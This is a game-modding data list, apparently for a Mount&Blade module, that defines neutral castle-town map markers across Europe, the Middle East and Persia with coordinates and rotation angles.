("jaisalmer", "Jaisalmer", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-542.62, -26.5), [], 180.0),
("quetta", "Quetta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-502.48, -65.72), [], 10.0),
("rome", "Rome", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (92.8, -206.4), [], 135.0),
("ravenna", "Ravenna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.8, -243.16), [], 135.0),
("messana", "Messana", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (62.4, -157.6), [], 280.0),
("brundisium", "Brundisium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (34.12, -189.24), [], 260.0),
("verona", "Verona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (109.56, -254.12), [], 280.0),
("liguria", "Liguria", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (139.2, -246.4), [], 65.0),
("cagliari", "Cagliari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (130.4, -174.8), [], 145.0),
("capua", "Capua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (78.64, -199.48), [], 145.0),
("croton", "Croton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (44.6, -171.04), [], 275.0),
("aquileia", "Aquileia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.56, -259.04), [], 90.0),
("arretium", "Arretium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (101.32, -229.72), [], 225.0),
("bologna", "Bologna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (106.08, -240.2), [], 180.0),
("neapolis", "Neapolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (73.72, -193.56), []),
("ajaccio", "Ajaccio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (132.0, -206.8), [], 160.0),
("salerno", "Salerno", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (67.6, -191.12), [], 55.0),
("pescara", "Pescara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (74.8, -213.44), [], 15.0),
("foggia", "Foggia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.36, -201.56), [], 60.0),
("udine", "Venice", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (93.88, -255.26), [], 55.0),
("spalato", "Spalato", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.16, -191.96), [], 90.0),
("terni", "Terni", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (91.04, -215.0), [], 90.0),
("bari", "Bari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (45.56, -195.48), [], 45.0),
("mediolanum", "Mediolanum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (129.12, -254.72), [], 90.0),
("etruscan", "Etruscan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (110.0, -223.24), [], 90.0),
("locri", "Locri", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (51.0, -161.68), [], 85.0),
("thurii", "Thurii", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (49.68, -177.24), [], 125.0),
("genoa", "Genoa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.44, -241.08), [], 270.0),
("ancona", "Ancona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.04, -228.3), [], 175.0),
("modena", "Modena", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (110.6, -242.76), []),
("terracina", "Terracina", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (85.24, -199.36), [], 105.0),
("jerusalem", "Jerusalem", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.8, -82.92), [], 170.0),
("antioch", "Antioch", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-167.12, -133.12), [], 100.0),
("cyprus", "Cyprus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-136.8, -121.6), [], 260.0),
("acre", "Acre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.4, -93.2), [], 115.0),
("tripoli", "Tripoli", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -115.6), [], 10.0),
("sidon", "Sidon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-157.28, -103.04), [], 275.0),
("tarsus", "Tarsus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-157.8, -144.2), [], 240.0),
("saheth", "Saheth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-171.08, -112.16), [], 240.0),
("tyre", "Tyre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-160.28, -107.68), [], 180.0),
("aleppo", "Aleppo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-178.12, -134.48), [], 45.0),
("kiev", "Kiev", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-103.46, -321.88), [], 90.0),
("lutsk", "Lutsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-47.2, -331.2), [], 270.0),
("chernigov", "Chernigov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.24, -342.84), [], 280.0),
("mariupol", "Mariupol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-180.28, -278.12), [], 180.0),
("mazyr", "Mazyr", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.0, -351.48), []),
("kirovohrad", "Kirovohrad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-122.6, -297.52), [], 15.0),
("belgorod", "Belgorod", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-170.36, -328.68), [], 80.0),
("armabir", "Armabir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-219.56, -248.2), [], 80.0),
("poltava", "Poltava", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-148.0, -313.6), [], 55.0),
("zhytomyr", "Zhytomyr", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-83.32, -323.68), [], 10.0),
("babrujsk", "Babrujsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.24, -369.24), [], 45.0),
("bryansk", "Bryansk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-146.52, -371.12), [], 60.0),
("syutuka", "Syutuka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-136.28, -348.92), [], 90.0),
("tambov", "Tambov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-222.8, -361.8), [], 180.0),
("paris", "Paris", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (202.04, -303.52), [], 120.0),
("rouen", "Rouen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (217.2, -312.0), [], 45.0),
("toulon", "Toulon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (164.72, -224.0), [], 260.0),
("nancy", "Nancy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (161.6, -300.4), [], 130.0),
("toulouse", "Toulouse", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (212.7, -230.38), [], 45.0),
("lyon", "Lyon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (176.4, -258.6), [], 270.0),
("reims", "Reims", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (185.44, -308.44), [], 45.0),
("le_mans", "Le mans", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (227.52, -290.64), [], 315.0),
("dijon", "Dijon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (173.76, -280.52), []),
("troyes", "Troyes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (181.88, -292.96), [], 180.0),
("lille", "Lille", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (196.2, -329.56), [], 20.0),
("avignon", "Avignon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (176.64, -233.64), [], 60.0),
("orleans", "Orleans", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (209.34, -290.64), [], 260.0),
("digoin", "Digoin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (186.28, -268.44), [], 15.0),
("caen", "Caen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (233.28, -307.8), [], 80.0),
("valladolid", "Valladolid", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (194.0, -253.84), [], 165.0),
("bourges", "Bourges", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (199.2, -276.8), [], 145.0),
("laon", "Laon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (190.2, -313.48), [], 270.0),
("angers", "Angers", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (235.8, -284.24), [], 180.0),
("babylon", "Babylon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-258.16, -102.78), [], 150.0),
("persepolise", "Persepolise", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-348.0, -62.0), [], 90.0),
("susa", "Susa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-291.06, -83.44), [], 50.0),
("egbatana", "Egbatana", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-290.24, -117.3), [], 80.0),
("birjand", "Birjand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-416.8, -95.2), [], 280.0),
("mosul", "Mosul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-244.56, -136.22), [], 260.0),
("herat", "Herat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-449.6, -112.8), [], 315.0),
("zahedan", "Zahedan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-434.8, -57.2), [], 225.0),
("abu_dhabi", "Abu Dhabi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-364.24, 2.48), [], 90.0),
("dammam", "Dammam", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-315.88, -23.28), [], 120.0),
("kandahar", "Kandahar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-488.12, -81.92), [], 45.0),
("kashan", "Kashan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-332.52, -108.88), [], 275.0),
("turbat", "Turbat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-459.16, -19.4), [], 315.0),
("al_ain", "Al Ain", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-379.6, 0.8), [], 180.0),
("isfahan", "Isfahan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-334.72, -92.92), [], 20.0),
("semnan", "Semnan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-353.68, -127.36), [], 90.0),
("kerman", "Kerman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-393.68, -66.2), [], 240.0),
("bandar_abbas", "Bandar Abbas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-384.84, -32.44), [], 35.0),
("erzurum", "Erzurum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-221.24, -180.92), [], 180.0),
("batman", "Batman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-219.6, -154.92), [], 90.0),
("tabriz", "Tabriz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-276.4, -157.16), [], 90.0),
("abadan", "Abadan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-298.84, -63.44), []),
("farah", "Farah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-448.92, -89.88), [], 20.0),
("qazvin", "Qazvin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-316.4, -135.2), [], 90.0),
("dubai", "Dubai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-374.72, -10.72), [], 95.0),
("al_batin", "Al batin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-272.48, -45.56), [], 125.0),
("arak", "Arak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-313.12, -109.84), [], 45.0),
("chabahar", "Chabahar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-433.8, -13.72), [], 45.0),
("loskile", "Loskile", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.4, -409.4), [], 80.0),
("oslo", "Oslo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (111.5816, -488.68), [], 260.0),
("bergen", "Bergen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (171.8, -498.36), [], 260.0),
("viborg", "Viborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.48, -425.0), [], 125.0),
("husum", "Husum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.6, -392.0), [], 125.0),
("stavanger", "Stavanger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (167.2, -471.16), [], 75.0),
("faroe", "Faroe", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (306.08, -534.52), [], 110.0),
("trondheim", "Trondheim", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (114.64, -559.16), []),
("kristiansand", "Kristiansand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (142.36, -455.32), [], 345.0),
("aalborg", "Aalborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (121.16, -435.48), [], 55.0),
("helsingborg", "Helsingborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (90.16, -417.92), [], 15.0),
("odense", "Odense", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (115.8, -406.68), [], 90.0),
("haugesund", "Haugesund", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (171.4, -479.8), [], 160.0),
("skien", "Skien", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (124.6, -475.76), [], 180.0),
("hamar", "Hamar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (108.48, -506.28), [], 60.0),
("torshavn", "Torshavn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (304.36, -530.8), [], 145.0),
("mold", "Mold", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (151.08, -546.04), [], 215.0),
("lerwick", "Lerwick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (243.08, -492.56), [], 35.0),
("grimstad", "Grimstad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.96, -458.4), [], 175.0),
("frankfurt", "Frankfurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (134.4, -321.88), [], 135.0),
("luebeck", "Luebeck", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (112.56, -381.28), [], 80.0),
("magdeburg", "Magdeburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (102.0, -352.8), [], 300.0),
("hamburg", "Hamburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (119.6, -376.0), [], 260.0),
("munich", "Munich", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (102.8, -292.4), [], 260.0),
("vienna", "Vienna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.96, -295.48), [], 235.0),
("nuremberg", "Nuremberg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (108.4, -311.6), [], 55.0),
("cologne", "Cologne", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (153.6, -333.6), [], 85.0),
("dresden", "Dresden", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (77.88, -338.28), [], 155.0),
("rostock", "Rostock", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (95.68, -384.24), [], 80.0),
("karlsruhe", "Karlsruhe", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (137.88, -305.0), [], 270.0),
("bielefeld", "Bielefeld", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.48, -351.08), [], 125.0),
("essen", "Essen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (152.8, -342.72), [], 180.0),
("bremen", "Bremen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.32, -367.72), [], 40.0),
("chemnitz", "Chemnitz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (87.2, -327.6), [], 20.0),
("kiel", "Kiel", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (118.84, -388.4), [], 10.0),
("dortmund", "Dortmund", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (148.08, -343.32), [], 55.0),
("prague", "Prague", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (71.72, -321.08), [], 45.0),
("stuttgart", "Stuttgart", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.6, -301.52), [], 45.0),
("berlin", "Berlin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.64, -359.04), [], 85.0),
("brno", "Brno", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.4, -307.6), [], 45.0),
("groningen", "Groningen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (157.2, -365.6), [], 225.0),
("leipzig", "Leipzig", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (94.32, -340.24), [], 125.0),
("plzen", "Plzen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (83.4, -315.72), []),
("neubrandenburg", "Neubrandenburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (84.6, -375.84), [], 145.0),
("brunswick", "Brunswick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (114.4, -354.84), [], 15.0),
("antwerp", "Antwerp", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (181.22, -343.58), [], 85.0),
("amsterdam", "Amsterdam", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (175.6, -356.0), [], 55.0),
("geneva", "Geneva", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (162.2, -265.04), [], 160.0),
("luxembourg", "Luxembourg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (162.84, -316.0), [], 60.0),
("uppsala", "Uppsala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (36.0, -487.2), [], 290.0),
("gothenburg", "Gothenburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.76, -451.12), [], 260.0),
("skara", "Skara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.4, -454.0), [], 260.0),
("visby", "Visby", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (28.4, -443.6), [], 50.0),
("helsinki", "Helsinki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-42.84, -493.72), [], 95.0),
("norrkoping", "Norrkoping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (53.28, -462.52), [], 180.0),
("falun", "Falun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.56, -501.96), [], 275.0),
("turku", "Turku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-13.64, -498.88), []),
("kalmar", "Kalmar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (52.6, -429.82), [], 95.0),
("varberg", "Varberg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (95.92, -444.0), [], 45.0),
("tingsryd", "Tingsryd", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (65.24, -423.92), [], 60.0),
("stockholm", "Stockholm", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (31.6, -477.6), [], 15.0),
("karlstad", "Karlstad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (81.6, -478.72), [], 35.0),
("tallinn", "Tallinn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-40.48, -479.4), [], 90.0),
("linkoping", "Linkoping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.92, -459.2), [], 225.0),
("salo", "Salo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-23.2, -498.0), [], 15.0),
("orebro", "Orebro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (63.24, -476.24), [], 85.0),
("damascus", "Damascus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -102.76), [], 310.0),
("alexandria", "Alexandria", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-97.6, -75.8456), []),
("cairo", "Cairo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-111.56, -63.6), [], 75.0),
("kaerak", "Kaerak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-158.0, -72.4), [], 260.0),
("damietta", "Damietta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-116.76, -79.0), [], 45.0),
("benghazi", "Benghazi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.4, -85.96), [], 45.0),
("aqaba", "Aqaba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.32, -59.56), [], 260.0),
("al_arish", "Al Arish", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-143.6, -75.2), [], 125.0),
("suwayda", "Suwayda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-175.36, -87.16), [], 265.0),
("mecca", "Mecca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-205.48, 29.96), [], 80.0),
